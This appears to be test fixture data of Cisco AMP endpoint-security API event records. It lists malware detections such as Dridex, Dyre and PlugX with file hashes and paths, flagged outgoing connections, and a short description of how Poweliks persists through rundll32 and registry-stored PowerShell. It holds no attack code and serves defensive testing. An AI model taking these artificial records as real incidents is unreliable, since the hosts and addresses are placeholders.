-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat 